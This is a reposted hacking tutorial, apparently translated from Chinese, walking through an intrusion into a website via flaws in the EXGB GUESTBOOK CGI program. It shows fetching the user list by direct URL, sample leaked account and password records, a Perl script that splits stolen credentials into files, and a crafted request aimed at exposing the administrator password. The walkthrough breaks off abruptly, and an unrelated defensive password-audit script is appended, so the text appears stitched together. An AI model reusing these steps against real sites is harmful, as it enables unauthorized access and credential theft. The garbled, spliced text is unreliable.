A virtual intrusion

xiaoxiao 2021-03-06 33

by analysist
http://www.china4lert.org

This is a virtual intrusion, because the process of the intrusion is virtual, but it is also very real, because we can intrude into any similar website in the way introduced here.

The basic situation of the host we are about to intrude into is as follows:

Operating system: RedHat Linux v7.1
Host address: http://www.notfound.org
Web server: Apache v1.3.20

Good, enough nonsense, let's start!

In general, if a website's administrator is reasonably competent, it should be difficult for us to find a vulnerability in the operating system or the web server, and this administrator looks fairly diligent. We made some simple tests and finally decided to start with CGI.

After some time of observation and analysis, we found that there are mainly two CGI programs running on this website: one is a forum whose name I had not heard of, and the other is EXGB GUESTBOOK. I tried the forum first and felt that it should be fairly secure; at least its error handling is done well. I submitted a few special requests and did not get even any system information, so it seems I can't find any breakthrough there.

But what about EXGB GUESTBOOK? It has vulnerabilities. If you want to know the specific details of the vulnerabilities, you can visit the following links:

EXGB GUESTBOOK registered user information leak vulnerability: http://v7.51.net/exploites/gBook1.txt
EXGB GUESTBOOK vulnerability revealing the super administrator password: http://v7.51.net/exploites/gbook2.txt
EXGB GUESTBOOK vulnerability overwriting any ".php" file: http://v7.51.net/exploites/gbook3.txt

OK, let's first take a look at the registered user information of this guestbook. Enter in the IE address bar:

http://www.notfound.org/gbook/data/User.list

See what we get?

```
820
Medana|!:!|CCTV6|!:!|Medana@163.net|!:!|http://souce.myrice.com|!:!|Xing xing liu yan
23423432|!:!|111|!:!|111@sina.com|!:!|http://333.com|!:!|My message
...
```

There are more than 800 registered users, so it seems to be a relatively well-known, large site, but why would it use such a bad CGI program? Is it that this CGI program is very well known? // sigh ... people these days!

I am not interested in the information of these registered users, but I really want to study what kind of strings people use as passwords, so I wrote a small program to separate out the registered users' accounts and passwords. The source code is as follows:

```perl
#!/usr/bin/perl
# This tool is designed by analysist
# Welcome to visit http://www.china4lert.org

# Exactly one argument is expected: the downloaded user list file.
$argc = @ARGV;
if ($argc != 1) {
    print "Usage: $0 <datafile>\n";
    exit(1);
}

$datafile = shift;
if (!(-e $datafile)) {
    print "File not found!\n";
    exit(1);
}

# Start from empty output files.
$user = "user.db";
$pass = "pass.db";
if (-e $user) { unlink $user; }
if (-e $pass) { unlink $pass; }

open(DATA, '<', $datafile) or die "Cannot open $datafile: $!\n";
open(USER, '>>', $user)    or die "Cannot open $user: $!\n";
open(PASS, '>>', $pass)    or die "Cannot open $pass: $!\n";

# Each record is a line of fields separated by "|!:!|":
# field 0 is the account, field 1 is the password.
while ($line = <DATA>) {
    if ($line =~ /\|!:!\|/) {
        @data = split(/\|!:!\|/, $line);
        print USER $data[0] . "\n";
        print PASS $data[1] . "\n";
    }
}

close(DATA);
close(USER);
close(PASS);
```

It is simple. Here I suggest you learn the Perl language, because it is indeed a very good language, and its text-handling capability is something other languages cannot match.

The results of the analysis are surprising: about 90% of the user passwords are digit sequences, and about 5% of the users have the same account and password. Doesn't this make you worry about the security awareness of domestic users?!

OK, let's take a look at what the super administrator's password is. We submit a request:

http://www.notfound.org/gbook/index.php?action=reg&name=test&assword1=$password2=$pass&uth=$pass&email= Test@test.org&home=http://www.test.org&title=$Pass&ubb=1&html=1&page=5&up=Header&down=Footer&regsub=
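The password analysis described above (the share of all-digit passwords and of passwords equal to the account name), written as a check a site operator can run over their own user store and reuse at registration time. This is an added example, not the author's code; the sample records are constructed, and the function names and the `|!:!|` record layout as read from the page are assumptions.

```python
import re
from collections import Counter

DELIM = "|!:!|"  # field separator of the guestbook user list, as read from the page

# Constructed sample records: account, password, e-mail, homepage, message.
SAMPLE = (
    "5\n"
    "alice|!:!|19820314|!:!|alice@example.org|!:!|http://example.org|!:!|hello\n"
    "bob|!:!|Bob|!:!|bob@example.org|!:!|http://example.org|!:!|hi\n"
    "carol|!:!|Tr4il-mix!|!:!|carol@example.org|!:!|http://example.org|!:!|hey\n"
    "dave|!:!|123456|!:!|dave@example.org|!:!|http://example.org|!:!|yo\n"
    "7788|!:!|7788|!:!|n@example.org|!:!|http://example.org|!:!|msg\n"
)

def parse_records(text):
    """Yield (account, password) from every line that contains the delimiter."""
    for line in text.splitlines():
        if DELIM not in line:
            continue  # the leading count line and blank lines carry no record
        fields = [f.strip() for f in line.split(DELIM)]
        yield fields[0], fields[1]

def weaknesses(account, password):
    """Return the weak patterns that apply to one account/password pair."""
    found = []
    if not password:
        found.append("empty")  # edge case added here, not reported in the article
    if re.fullmatch(r"[0-9]+", password):
        found.append("digits_only")  # the article's "digit sequence" passwords
    if password and password.casefold() == account.casefold():
        found.append("same_as_account")  # the article's account == password case
    return found

def audit(text):
    """Return the record count and the percentage of records per weak pattern."""
    records = list(parse_records(text))
    counts = Counter(w for acct, pw in records for w in weaknesses(acct, pw))
    total = len(records)
    percent = {k: round(100.0 * v / total, 1) for k, v in counts.items()} if total else {}
    return {"total": total, "percent": percent}

def acceptable_at_registration(account, password):
    """Registration-time gate: refuse any password showing one of the patterns."""
    return not weaknesses(account, password)

if __name__ == "__main__":
    print(audit(SAMPLE))
```

The audit needs plaintext passwords, which is how the guestbook in the article stores them; on a store that hashes passwords, only the registration-time check applies.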

When reposting, please cite the original address: https://www.9cbs.com/read-66166.html
